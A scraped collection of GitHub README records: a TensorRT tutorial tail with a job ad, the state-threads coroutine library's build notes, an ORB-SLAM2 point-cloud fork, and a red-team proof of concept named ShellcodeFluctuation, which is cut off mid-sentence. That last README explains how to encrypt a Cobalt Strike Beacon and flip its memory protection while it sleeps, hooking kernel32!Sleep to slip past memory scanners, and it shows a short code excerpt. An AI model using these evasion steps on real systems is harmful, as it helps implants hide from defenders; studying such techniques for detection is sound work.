Tutorial on my own, which mainly includes three parts:\n - TensorRT User Guide translation;\n - Introduction and analysis of TensorRT samples;\n - Experience with TensorRT.\n\n Thanks to everyone who contributed to this translation project.\n \n Content source:\n TensorRT download page:\n https://dedeveloper.nvidia.com/nvidia-tensorrt-20-download\n \n TensorRT Documentation, Samples\n In the corresponding directory after installation\n \n## Participants (ordered by participation time)\nTensorRT User Guide translation\n - [Lit Leo][18]\n - [Moyan Zitto][19]\n\ntranslation proofreading\n\n - Zhao Kaiyong\n\nTensorRT samples introduction analysis explanation\n-[Lit Leo][20]\n\nExperience with TensorRT.\n\nIf you want to participate, please join the QQ group: 483063470\n\nSupport donation projects\n\n \n\n## Recruiting interns\n[Internship] [Tencent Beijing AILAB] Recruit AI Heterogeneous Acceleration Interns\nThe resume is directly sent to the person in charge, and the resume is guaranteed to be responded quickly.\nBasic conditions: Familiar with C++, at least 6 months of internship\nWork content:\n1. Use C++ to reproduce the model trained by the framework and perform CPU, GPU, and ARM acceleration to meet the performance requirements of the launch.\n2. Research various inference frameworks and put them into production\nbonus:\n1. Have written or maintained deep learning framework code;\n2. Know how to develop CUDA, write kernel by yourself, know how to use cublas, cudnn and other libraries;\n3. Linux cpu c++ programming ability, can write avx, can use mkl;\n4. Familiar with deep learning calculation process\n5. Strong learning ability and long practice time\nContact: leowgyang@tencent.com\n\n [1]: https://developer.nvidia.com/nvidia-tensorrt3rc-download\n [2]: https://developer.nvidia.com/nvidia-tensorrt-download\n [3]: http://docs.nvidia.com/deeplearning/sdk/tensorrt-user-guide/index.html\n [4]: https://devblogs.nvidia.com/parallelforall/deploying-deep-learning-nvidia-tensorrt/\n [5]: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf\n [6]: http://on-demand.gputechconf.com/gtc/2017/video/s7310-szymon-migacz-8-bit-inference-with-tensorrt.mp4\n [7]: https://github.com/LitLeo/TensorRT_Tutorial/tree/master/cublas&cudnn_int8_demo\n [8]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/GTC-China-2017-NVIDIA-INT8.pdf\n [9]: https://github.com/google/gemmlowp\n [10]: https://mp.weixin.qq.com/s/E5qbMsuc7UBnNmYBzq__5Q\n [11]: https://mp.weixin.qq.com/s/wyqxUlXxgA9Eaxf0AlAVzg\n [12]: https://mp.weixin.qq.com/s/nuEVZlS6JfqRQo30S0W-Ww?scene=25#wechat_redirect\n [13]: https://mp.weixin.qq.com/s/xabDoauJc16z3-gpyre8zA\n [14]: https://mp.weixin.qq.com/s/F_VvLTWfg-COZKrQAtOSwg\n [15]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/blogs/%E4%BD%BF%E7%94%A8TensorRT%E5%AE%9E%E7%8E%B0leaky%20relu%E5 %B1%82.md\n [16]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/blogs/TensorRT%20Plugin%E4%BD%BF%E7%94%A8%E6%96%B9%E5%BC%8F% E7%AE%80%E4%BB%8B-%E4%BB%A5leaky%20relu%E5%B1%82%E4%B8%BA%E4%BE%8B.md\n [17]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/Bug.md\n [18]: https://github.com/LitLeo\n [19]: https://github.com/MoyanZitto\n [20]: https://github.com/LitLeo\n [21]: https://www.bilibili.com/video/BV1Nf4y1v7sa/\n [22]: https://www.bilibili.com/video/BV1x5411n76K/\n [23]: https://www.bilibili.com/video/BV19V411t7LV/\n [24]: https://www.bilibili.com/video/BV1DT4y1A7Rx/\n [25]: https://www.bilibili.com/video/BV1op4y1p7bj/\n [26]: https://www.bilibili.com/video/BV1Qi4y1N7YS/\n [27]: https://www.bilibili.com/video/BV19Y411g7YY/", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ossrs/state-threads", "link": "https://github.com/ossrs/state-threads", "tags": ["srs", "coroutines", "greenlet", "fiber", "networking", "server-side", "state-threads", "c", "concurrency", "async", "asyncio", "library"], "stars": 648, "description": "Lightweight thread library for C/C++ coroutine (similar to goroutine), for high performance network servers.", "lang": "C++", "repo_lang": "", "readme": "# state-threads\n\n![](http://ossrs.net:8000/gif/v1/sls.gif?site=github.com&path=/srs/srsst)\n[![](https://github.com/ossrs/state-threads/actions/workflows/test.yml/badge.svg?branch=srs)](https://github.com/ossrs/state-threads/actions?query=workflow%3ATest+branch%3Asrs)\n[![](https://codecov.io/gh/ossrs/state-threads/branch/srs/graph/badge.svg)](https://codecov.io/gh/ossrs/state-threads/branch/srs)\n[![](https://cloud.githubusercontent.com/assets/2777660/22814959/c51cbe72-ef92-11e6-81cc-32b657b285d5.png)](https://ossrs.net/lts/zh-cn/contact)\n\nFork from http://sourceforge.net/projects/state-threads, patched for [SRS](https://github.com/ossrs/srs/tree/2.0release).\n\n> See: https://github.com/ossrs/state-threads/blob/srs/README\n\nFor original ST without any changes, checkout the [ST master branch](https://github.com/ossrs/state-threads/tree/master).\n\n## LICENSE\n\n[state-threads](https://github.com/ossrs/state-threads/blob/srs/README#L68) is licenced under [MPL or GPLv2](https://ossrs.net/lts/zh-cn/license#state-threads).\n\n## Linux: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor Linux:\n\n```bash\nmake linux-debug\n```\n\nFor Linux aarch64, which fail with `Unknown CPU architecture`:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-D__aarch64__\"\n```\n\n> Note: For more CPU architectures, please see [#22](https://github.com/ossrs/state-threads/issues/22)\n\nLinux with valgrind:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-DMD_VALGRIND\"\n```\n\n> Remark: User must install valgrind, for instance, in centos6 `sudo yum install -y valgrind valgrind-devel`.\n\nLinux with valgrind and epoll:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-DMD_HAVE_EPOLL -DMD_VALGRIND\"\n```\n\n## Mac: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor OSX:\n\n```bash\nmake darwin-debug\n```\n\nFor OSX, user must specifies the valgrind header files:\n\n```bash\nmake darwin-debug EXTRA_CFLAGS=\"-DMD_HAVE_KQUEUE -DMD_VALGRIND -I/usr/local/include\"\n```\n\n> Remark: M1 is unsupported by ST, please use docker to run, please read [SRS#2747](https://github.com/ossrs/srs/issues/2747).\n\n## Windows: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor Cygwin(Windows):\n\n```\nmake cygwin64-debug\n```\n\n> Remark: Windows native build is unsupported right now.\n\n## Branch SRS\n\nThe branch [srs](https://github.com/ossrs/state-threads/tree/srs) was patched and refined:\n\n- [x] ARM: Patch [st.arm.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/1.st.arm.patch), for ARM.\n- [x] OSX: Patch [st.osx.kqueue.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/3.st.osx.kqueue.patch), for osx.\n- [x] Linux: Patch [st.disable.examples.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/4.st.disable.examples.patch), for ubuntu.\n- [x] System: [Refine TAB of code](https://github.com/ossrs/state-threads/compare/c2001d30ca58f55d72a6cc6b9b6c70391eaf14db...d2101b26988b0e0db0aabc53ddf452068c1e2cbc).\n- [x] ARM: Merge from [michaeltalyansky](https://github.com/michaeltalyansky/state-threads) and [xzh3836598](https://github.com/ossrs/state-threads/commit/9a17dec8f9c2814d93761665df7c5575a4d2d8a3), support [ARM](https://github.com/ossrs/state-threads/issues/1).\n- [x] Valgrind: Merge from [toffaletti](https://github.com/toffaletti/state-threads), support [valgrind](https://github.com/ossrs/state-threads/issues/2) for ST.\n- [x] OSX: Patch [st.osx10.14.build.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/6.st.osx10.14.build.patch), for osx 10.14 build.\n- [x] ARM: Support macro `MD_ST_NO_ASM` to disable ASM, [#8](https://github.com/ossrs/state-threads/issues/8).\n- [x] AARCH64: Merge patch [srs#1282](https://github.com/ossrs/srs/issues/1282#issuecomment-445539513) to support aarch64, [#9](https://github.com/ossrs/state-threads/issues/9).\n- [x] OSX: Support OSX for Apple Darwin, macOS, [#11](https://github.com/ossrs/state-threads/issues/11).\n- [x] System: Refine performance for sleep or epoll_wait(0), [#17](https://github.com/ossrs/state-threads/issues/17).\n- [x] System: Support utest by gtest and coverage by gcov/gocvr.\n- [x] System: Only support for Linux and Darwin. [#19](https://github.com/ossrs/state-threads/issues/19), [srs#2188](https://github.com/ossrs/srs/issues/2188).\n- [x] System: Improve the performance of timer. [9fe8cfe5b](https://github.com/ossrs/state-threads/commit/9fe8cfe5b1c9741a2e671a46215184f267fba400), [7879c2b](https://github.com/ossrs/state-threads/commit/7879c2b), [387cddb](https://github.com/ossrs/state-threads/commit/387cddb)\n- [x] Windows: Support Windows 64bits. [#20](https://github.com/ossrs/state-threads/issues/20).\n- [x] MIPS: Support Linux/MIPS for OpenWRT, [#21](https://github.com/ossrs/state-threads/issues/21).\n- [x] LOONGARCH: Support loongarch for loongson CPU, [#24](https://github.com/ossrs/state-threads/issues/24). \n- [x] System: Support Multiple Threads for Linux and Darwin. [#19](https://github.com/ossrs/state-threads/issues/19), [srs#2188](https://github.com/ossrs/srs/issues/2188).\n- [x] RISCV: Support RISCV for RISCV CPU, [#24](https://github.com/ossrs/state-threads/pull/28).\n- [x] MIPS: Support Linux/MIPS64 for loongson 3A4000/3B3000, [#21](https://github.com/ossrs/state-threads/pull/21).\n- [x] AppleM1: Support Apple Silicon M1(aarch64), [#30](https://github.com/ossrs/state-threads/issues/30).\n- [x] IDE: Support CLion for debugging and learning.\n- [x] Define and use a new jmpbuf, because the structure is different.\n- [x] Check capability for backtrack.\n- [x] Support set specifics for any thread.\n- [x] Support st_destroy to free resources for asan.\n- [ ] System: Support sendmmsg for UDP, [#12](https://github.com/ossrs/state-threads/issues/12).\n\n## GDB Tools\n\n- [x] Support [nn_coroutines](https://github.com/ossrs/state-threads/issues/15#issuecomment-742218041), show number of coroutines.\n- [x] Support [show_coroutines](https://github.com/ossrs/state-threads/issues/15#issuecomment-742218612), show all coroutines and caller function.\n\n## Valgrind\n\nHow to debug with gdb under valgrind, read [valgrind manual](http://valgrind.org/docs/manual/manual-core-adv.html#manual-core-adv.gdbserver-simple).\n\nAbout startup parameters, read [valgrind cli](http://valgrind.org/docs/manual/mc-manual.html#mc-manual.options).\n\nImportant cli options:\n\n1. `--undef-value-errors= [default: yes]`, Controls whether Memcheck reports uses of undefined value errors. Set this to no if you don't want to see undefined value errors. It also has the side effect of speeding up Memcheck somewhat.\n1. `--leak-check= [default: summary]`, When enabled, search for memory leaks when the client program finishes. If set to summary, it says how many leaks occurred. If set to full or yes, each individual leak will be shown in detail and/or counted as an error, as specified by the options `--show-leak-kinds` and `--errors-for-leak-kinds`.\n1. `--track-origins= [default: no]`, Controls whether Memcheck tracks the origin of uninitialised values. By default, it does not, which means that although it can tell you that an uninitialised value is being used in a dangerous way, it cannot tell you where the uninitialised value came from. This often makes it difficult to track down the root problem.\n1. `--show-reachable= , --show-possibly-lost=`, to show the using memory.\n\n## Linux: UTest\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake linux-debug-utest && ./obj/st_utest\n```\n\nNote that the gcc(4.8) of CentOS is too old, please use docker(`ossrs/srs:dev-gcc7`) to run:\n\n```bash\ndocker run --rm -it -v $(pwd):/state-threads -w /state-threads \\\n registry.cn-hangzhou.aliyuncs.com/ossrs/srs:dev-gcc7 \\\n bash -c 'make linux-debug-utest && ./obj/st_utest'\n```\n\n## Mac: UTest\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake darwin-debug-utest && ./obj/st_utest\n```\n\n## Linux: Coverage\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake linux-debug-gcov && ./obj/st_utest\n```\n\nNote that the gcc(4.8) of CentOS is too old, please use docker(`ossrs/srs:dev-gcc7`) to run:\n\n```bash\ndocker run --rm -it -v $(pwd):/state-threads -w /state-threads \\\n registry.cn-hangzhou.aliyuncs.com/ossrs/srs:dev-gcc7 \\\n bash -c 'make linux-debug-gcov && ./obj/st_utest'\n```\n\nThen, install [gcovr](https://gcovr.com/en/stable/guide.html) for coverage:\n\n```bash\nyum install -y python2-pip &&\npip install lxml && pip install gcovr\n```\n\nFinally, run test and get the report:\n\n```bash\nbash auto/coverage.sh\n```\n\n## Mac: Coverage\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake darwin-debug-gcov && ./obj/st_utest\n```\n\nThen, install [gcovr](https://gcovr.com/en/stable/guide.html) for coverage:\n\n```bash\npip install gcovr\n```\n\nFinally, run test and get the report:\n\n```bash\nbash auto/coverage.sh\n```\n\n## Docs & Analysis\n\n* Introduction: http://ossrs.github.io/state-threads/docs/st.html\n* API reference: http://ossrs.github.io/state-threads/docs/reference.html\n* Programming notes: http://ossrs.github.io/state-threads/docs/notes.html\n\n* [How to porting ST to other OS/CPU?](https://github.com/ossrs/state-threads/issues/22)\n* About setjmp and longjmp, read [setjmp](https://gitee.com/winlinvip/srs-wiki/raw/master/images/st-setjmp.jpg).\n* About the stack structure, read [stack](https://gitee.com/winlinvip/srs-wiki/raw/master/images/st-stack.jpg)\n* About asm code comments, read [#91d530e](https://github.com/ossrs/state-threads/commit/91d530e#diff-ed9428b14ff6afda0e9ab04cc91d4445R25).\n* About the scheduler, read [#13-scheduler](https://github.com/ossrs/state-threads/issues/13#issuecomment-616025527).\n* About the IO event system, read [#13-IO](https://github.com/ossrs/state-threads/issues/13#issuecomment-616096568).\n* Code analysis, please read [#15](https://github.com/ossrs/state-threads/issues/15).\n\n## CLion\n\nUse [CLion](https://www.jetbrains.com/clion/) to open directory state-threads.\n\nThen, open `ide/st_clion/CMakeLists.txt` and click `Load CMake project`.\n\nFinally, select a configuration to run or debug.\n\nWinlin 2016\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gaoxiang12/ORBSLAM2_with_pointcloud_map", "link": "https://github.com/gaoxiang12/ORBSLAM2_with_pointcloud_map", "tags": [], "stars": 648, "description": null, "lang": "C++", "repo_lang": "", "readme": "# ORBSLAM2_with_pointcloud_map\nThis is a modified ORB_SLAM2 (from https://github.com/raulmur/ORB_SLAM2, thanks for Raul's great work!) with a online point cloud map module running in RGB-D mode. You can visualize your point cloud map during the SLAM process. \n\n# How to Install\nUnzip the file you will find two directories. First compile the modified g2o:\n\n```\n cd g2o_with_orbslam2\n mkdir build\n cd build\n cmake ..\n make \n```\n\nFollowing the instructions from the original g2o library: [https://github.com/RainerKuemmerle/g2o] if you have dependency problems. I just add the extra vertecies and edges provided in ORB_SLAM2 into g2o. \n\nThen compile the ORB_SLAM2. You need firstly to compile the DBoW2 in ORB_SLAM2_modified/Thirdpary, and then the Pangolin module (https://github.com/stevenlovegrove/Pangolin). Finally, build ORB_SLAM2:\n\n```\ncd ORB_SLAM2_modified\nmkdir build\ncd build\ncmake ..\nmake\n```\n\nTo run the program you also need to download the ORB vocabulary (which is a large file so I don't upload it) in the original ORB_SLAM2 repository.\n\n# Run examples\nPrepare a RGBD camera or dataset, give the correct parameters and you can get a ORB SLAM with point cloud maps like the example.jpg in this repo.\n\n# Build the unpacked modified repo \n\nplease see this [README](./ORB_SLAM2_modified/README.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mgeeky/ShellcodeFluctuation", "link": "https://github.com/mgeeky/ShellcodeFluctuation", "tags": [], "stars": 648, "description": "An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents", "lang": "C++", "repo_lang": "", "readme": "# Shellcode Fluctuation PoC\n\nA PoC implementation for an another in-memory evasion technique that cyclically encrypts and decrypts shellcode's contents to then make it fluctuate between `RW` (or `NoAccess`) and `RX` memory protection.\nWhen our shellcode resides in `RW` or `NoAccess` memory pages, scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve) will be unable to track it down and dump it for further analysis.\n\n## Intro\n\nAfter releasing [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) I've received a few questions about the following README's point:\n\n> Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents before sleeping (that could evade scanners such as Moneta or pe-sieve)\n\nBeforewards I was pretty sure the community already know how to encrypt/decrypt their payloads and flip their memory protections to simply evade memory scanners looking for anomalous executable regions.\nQuestions proven otherwise so I decided to release this unweaponized PoC to document yet another evasion strategy and offer sample implementation for the community to work with.\n\nThis PoC is a demonstration of rather simple technique, already known to the offensive community (so I'm not bringin anything new here really) in hope to disclose secrecy behind magic showed by some commercial frameworks that demonstrate their evasion capabilities targeting both aforementioned memory scanners.\n\n\n**Here's a comparison when fluctuating to RW** (another option is to fluctuate to `PAGE_NOACCESS` - described below):\n\n1. Beacon not encrypted\n2. **Beacon encrypted** (_fluctuating_)\n\n![comparison](images/comparison.png)\n\n\nThis implementation along with my [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. \ud83d\udcaa\n\n---\n\n## How it works?\n\nThis program performs self-injection shellcode (roughly via classic `VirtualAlloc` + `memcpy` + `CreateThread`). \nWhen shellcode runs (this implementation specifically targets Cobalt Strike Beacon implants) a Windows function will be hooked intercepting moment when Beacon falls asleep `kernel32!Sleep`. \nWhenever hooked `MySleep` function gets invoked, it will localise its memory allocation boundaries, flip their protection to `RW` and `xor32` all the bytes stored there. \nHaving awaited for expected amount of time, when shellcode gets back to our `MySleep` handler, we'll decrypt shellcode's data and flip protection back to `RX`.\n\n### Fluctuation to `PAGE_READWRITE` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. In contrary to what we had in `ThreadStackSpoofer`, here we're not hooking anything in ntdll to launch our shellcode but rather jump to it from our own function. This attempts to avoid leaving simple IOCs in memory pointing at modified ntdll memory.\n3. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n4. Beacon's memory allocation gets encrypted and protection flipped to `RW`\n5. We then unhook original `kernel32!Sleep` to avoid leaving simple IOC in memory pointing that `Sleep` have been trampolined (in-line hooked).\n5. A call to original `::Sleep` is made to let the Beacon's sleep while waiting for further communication.\n11. After Sleep is finished, we decrypt our shellcode's data, flip it memory protections back to `RX` and then re-hook `kernel32!Sleep` to ensure interception of subsequent sleep.\n\n### Fluctuation to `PAGE_NOACCESS` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread` ...\n4. Initialize Vectored Exception Handler (VEH) to setup our own handler that will catch _Access Violation_ exceptions.\n5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n6. Beacon's memory allocation gets encrypted and protection flipped to `PAGE_NOACCESS`\n7. We then unhook original `kernel32!Sleep` to avoid leaving simple IOC in memory pointing that `Sleep` have been trampolined (in-line hooked).\n8. A call to original `::Sleep` is made to let the Beacon's sleep while waiting for further communication.\n9. After Sleep is finished, we re-hook `kernel32!Sleep` to ensure interception of subsequent sleep.\n10. Shellcode then attempts to resume its execution which results in Access Violation being throwed since its pages are marked NoAccess.\n11. Our VEH Handler catches the exception, decrypts and flips memory protections back to `RX` and shellcode's is resumed.\n\n---\n\n### It's not a novel technique\n\nThe technique is not brand new, nothing that I've devised myself. Merely an implementation showing the concept and its practical utilisation to let our Offensive Security community catch up on offering made by commercial C2 frameworks. \n\nActually, I've been introduced to the idea of flipping shellcode's memory protection couple of years back through the work of [**Josh Lospinoso**](https://github.com/JLospinoso) in his amazing [Gargoyle](https://github.com/JLospinoso/gargoyle).\n\nHere's more background:\n- [gargoyle, a memory scanning evasion technique](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\n- [Bypassing Memory Scanners with Cobalt Strike and Gargoyle](https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/)\n\n**Gargoyle** takes the concept of self-aware and self-fluctuating shellcode a way further, by leveraging ROP sequence calling out to `VirtualProtect`. \nHowever the technique is impressive, its equally hard to leverage it with Cobalt Strike's Beacon without having to kill its thread and keep re-initializing Beacon while in memory.\n\nThat's far from perfect, however since we already operate from the grounds of our own self-injection loader process, we're able to do whatever we want with the environment in which shellcode operate and hide it however we like. This technique (and the previous one being [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer)) shows advantages from running our shellcodes this way.\n\nThe implementation of fluctuating to `PAGE_NOACCESS` is inspired by [ORCA666](https://github.com/ORCA666)'s work presented in his https://github.com/ORCA666/0x41 injector.\nHe showed that:\n\n1. we can initialize a vectored exception handler (VEH), \n2. flip shellcode's pages to no-access\n3. and then catch Access Violation exceptions that will occur as soon as the shellcode wants to resume its execution and decrypt + flip its memory pages back to Read+Execute.\n\nThis implementation contains this idea implemented, available with option `2` in ``. \nBe sure to check out other his projects as well.\n\n---\n\n## Demo\n\nThe tool `ShellcodeFluctuation` accepts three parameters: first one being path to the shellcode and the second one modifier of our functionality.\n\n```\nUsage: ShellcodeFluctuation.exe \n:\n -1 - Read shellcode but dont inject it. Run in an infinite loop.\n 0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n 1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n 2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\n### Moneta (seemingly) False Positive\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin -1\n```\n\nSo firstly we'll see what `Moneta64` scanner thinks about process that does nothing dodgy and simply resorts to run an infinite loop:\n\n![moneta false positive](images/false-positive.png)\n\nAs we can see there's some **false positive** (at least how I consider it) allegdly detecting `Mismatching PEB module` / `Phantom image`. \nThe memory boundaries point at the `ShellcodeFluctuate.exe` module itself and could indicate that this module however being of `MEM_IMAGE` type, is not linked in process' PEB - which is unsual and sounds rather odd.\nThe reason for this IOC is not known to me and I didn't attempt to understand it better, yet it isn't something we should be concerned about really.\n\nIf anyone knows what's the reason for this detection, I'd be very curious to hear! Please do reach out.\n\n### Not Encrypted Beacon\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 0\n```\n\nThe second use case presents Memory IOCs of a Beacon operating within our process, which does not utilise any sorts of customised `Artifact Kits`, `User-Defined Reflective Loaders` (such as my [`ElusiveMice`](https://github.com/mgeeky/ElusiveMice)), neither any initial actions that would spoil our results. \n\n![moneta not encrypted](images/not-encrypted.png)\n\nWe can see that `Moneta64` correctly recognizes `Abnormal private executable memory` pointing at the location where our shellcode resides. \nThat's really strong Memory IOC exposing our shellcode for getting dumped and analysed by automated scanners. Not cool.\n\n### Encrypted Beacon with RW protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 1\n```\n\nNow the third, most interesting from perspective of this implementation, use case being _fluctuating_ Beacon.\n\n![moneta encrypted](images/encrypted.png)\n\nApart from the first IOC, considered somewhat _false positive_, we see a new one pointing that `kernel32.dll` memory was modified. \nHowever, no `Abnormal private executable memory` IOC this time. Our fluctuation (repeated encryption/decryption and memory protections flipping is active).\n\nAnd for the record, `pe-sieve` also detects implanted PE when used with `/data 3` option (unless this option is given, no detection will be made):\n\n![pe-sieve](images/pe-sieve3.png)\n\nMy current assumption is that PE-Sieve is picking up on the same traits that Moneta does (described below in _Modified code in kernel32.dll_) - the fact that PE mapped module has a non-empty Working set, being an evident fact of code injection of some sort.\nThat is labeled as _Implanted PE_ / _Implanted_. If that's the case, conclusion is similar to the Moneta's observation. I don't think we should care that much about that IOC detection-wise.\n\nCurrently I thought of no better option to intercept shellcode's execution in the middle (now speaking of Cobalt Strike), other than to hook `kernel32!Sleep`. Thus, we are bound to leave these sorts of IOCs.\n\nBut hey, still none of the bytes differ compared to what is lying out there on the filesystem (`C:\\Windows\\System32\\kernel32.dll`) and no function is hooked, what's the deal? \ud83d\ude09\n\n\n\n### Encrypted Beacon with PAGE_NOACCESS protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 2\n```\n\n![no-access](images/no-access1.png)\n\nThat will cause the shellcode to fluctuate between `RX` and `NA` pages effectively.\n\nAt the moment I'm not sure of benefits of flipping into `PAGE_NOACCESS` instead of `PAGE_READWRITE`. \n\n\n### Modified code in kernel32.dll\n\nSo what about that modified `kernel32` IOC?\n\nNow, let us attempt to get to the bottom of this IOC and see what's the deal here.\n\nFirstly, we'll dump mentioned memory region - being `.text` (code) section of `kernel32.dll`. Let us use `ProcessHacker` for that purpose to utilise publicly known and stable tooling:\n\n![dump-kernel](images/dump-kernel.png)\n\nWe dump code section of allegedly modified kernel32 and then we do the same for the kernel32 running in process that did not modify that area.\n\nHaving acquired two dumps, we can then compare them byte-wise (using my [expdevBadChars](https://github.com/mgeeky/expdevBadChars)) to look for any inconsitencies:\n\n![bindiff](images/bindiff0.png)\n\nJust to see that they match one another. Clearly there isn't a single byte modified in `kernel32.dll` and the reason for that is because we're unhooking `kernel32!Sleep` before calling it out:\n\n`main.cpp:31:`\n```\n HookTrampolineBuffers buffers = { 0 };\n buffers.originalBytes = g_hookedSleep.sleepStub;\n buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n //\n // Unhook kernel32!Sleep to evade hooked Sleep IOC. \n // We leverage the fact that the return address left on the stack will make the thread\n // get back to our handler anyway.\n //\n fastTrampoline(false, (BYTE*)::Sleep, &MySleep, &buffers);\n\n // Perform sleep emulating originally hooked functionality.\n ::Sleep(dwMilliseconds);\n```\n\nSo what's causing the IOC being triggered? Let us inspect `Moneta` more closely:\n\n![moneta](images/moneta.png)\n\nBreaking into Moneta's `Ioc.cpp` just around the 104 line where it reports `MODIFIED_CODE` IOC, we can modify the code a little to better expose the exact moment when it analyses kernel32 pool.\nNow:\n\n1. The check is made to ensure that kernel32's region is executable. We see that in fact that region is executable `a = true`\n2. Amount of that module's private memory is acquired. Here we see that `kernel32` has `b = 0x1000` private bytes. How come? There should be `0` of them.\n3. If executable allocation is having more than 0 bytes of private memory (`a && b`) the IOC is reported\n4. And that's a proof we were examining kernel32 at that time.\n\nWhen Windows Image Loader maps a DLL module into process' memory space, the underlying memory pages will be labeled as `MEM_MAPPED` or `MEM_IMAGE` depending on scenario. \nWhenever we modify even a single byte of the `MEM_MAPPED`/`MEM_IMAGE` allocation, the system will separate a single memory page (assuming we modified less then `PAGE_SIZE` bytes and did not cross page boundary) to indicate fragment that does not maps back to the original image.\n\nThis observation is then utilised as an IOC - an image should not have `MEM_PRIVATE` allocations within its memory region (inside of it) because that would indicate that some bytes where once modified within that region. Moneta is correctly picking up on code modification if though bytes were matching original module's bytes at the time of comparison.\n\nFor a comprehensive explanation of how Moneta, process injection implementation and related IOC works under the hood, read following top quality articles by **Forrest Orr**:\n\n1. [Masking Malicious Memory Artifacts \u2013 Part I: Phantom DLL Hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)\n2. [Masking Malicious Memory Artifacts \u2013 Part II: Blending in with False Positives](https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta)\n3. [Masking Malicious Memory Artifacts \u2013 Part III: Bypassing Defensive Scanners](https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners)\n\nThat's a truly outstanding research and documentation done by Forrest, great work pal!\n\nEspecially the second article outlines the justification for this detection, as we read what Forrest teaches us:\n\n> In the event that the module had been legitimately loaded and added to the PEB, the shellcode implant would still have been detected due to the 0x1000 bytes (1 page) of memory privately mapped into the address space and retrieved by Moneta by querying its working set - resulting in a modified code IOC as seen above.\n\n\nTo summarise, we're leaving an IOC behind but should we be worried about that?\nEven if there's an IOC there are no stolen bytes visible, so no immediate reference pointing back to our shellcode or distinguishing our shellcode's technique from others.\n\nLong story short - we shouldn't be really worried about that IOC. :-)\n\n\n### But commercial frameworks leave no IOCs\n\nOne can say, that this implementation is far from perfect because it leaves something, still there are IOCs and the commercial products show they don't have similar traits.\n\nWhen that argument's on the table I need to remind, that, the commercial frameworks have complete control over source code of their implants, shellcode loaders and thus can nicely integrate one with another to avoid necessity of hooking and hacking around their shellcode themselves. Here, we need to hook `kernel32!Sleep` to intercept Cobalt Strike's Beacon execution just before it falls asleep in order to kick on with our housekeeping. If there was a better mechanism for us kicking in without having to hook sleep - that would be perfect.\n\nHowever there is a notion of [_Sleep Mask_](https://www.cobaltstrike.com/help-sleep-mask-kit) introduced to Cobalt Strike, the size restrictions for being hundreds of byte makes us totally unable to introduce this logic to the mask itself (otherwise we'd be able not to hook `Sleep` as well, leaving no IOCs just like commercial products do).\n\nAnother argument might be, that commercial framework integrate these sorts of logic into their _Reflective Loaders_ and here we instead leave it in EXE harness.\nThat's true, but the reason for such a decision is twofold:\n\n1. I need to be really careful with releasing this kind of technology to avoid the risk of helping weaponize the real-world criminals with an implementation that will haunt us back 